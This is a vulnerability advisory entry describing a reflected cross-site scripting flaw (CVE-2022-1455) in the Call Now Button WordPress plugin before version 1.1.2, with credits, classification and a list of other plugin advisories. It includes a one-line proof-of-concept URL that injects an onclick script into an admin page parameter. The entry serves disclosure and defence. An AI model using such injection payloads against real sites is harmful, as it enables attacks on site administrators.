WordPress Plugin Vulnerabilities

Call Now Button < 1.1.2 - Reflected Cross-Site Scripting

Description

The plugin does not escape a parameter before outputting it back in an attribute of a hidden input, leading to a Reflected Cross-Site Scripting when the premium is enabled

Proof of Concept

With premium enabled: http://example.com/wp-admin/admin.php?page=call-now-button&bid=xxxxx" accesskey=X onclick=alert(/XSS/) test="

Affects Plugins

Plugin icon
call-now-button
Fixed in 1.1.2

References

CVE
CVE-2022-1455

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
3.4 (low)

Miscellaneous

Original Researcher
7coo and ZhongFu Su(JrXnm) of Wuhan University
Submitter
7coo
Submitter website
https://7coo.github.io/
Verified
Yes
WPVDB ID
8267046e-870e-4ccd-b920-340233ed3b93

Timeline

Publicly Published
2022-04-25 (about 2 years ago)
Added
2022-04-25 (about 2 years ago)
Last Updated
2023-02-04 (about 1 years ago)

Other

Published
Title
Published
2024-04-29
Title
CPO Companion <= 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
Published
2023-03-20
Title
Stylish Cost Calculator Premium < 7.9.0 - Unauthenticated Stored XSS
Published
2023-10-22
Title
WP Post Columns <= 2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Published
2024-02-14
Title
Custom Field Template < 2.6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via $search_label
Published
2023-10-27
Title
Bonus for Woo < 5.8.3 - Reflected Cross-Site Scripting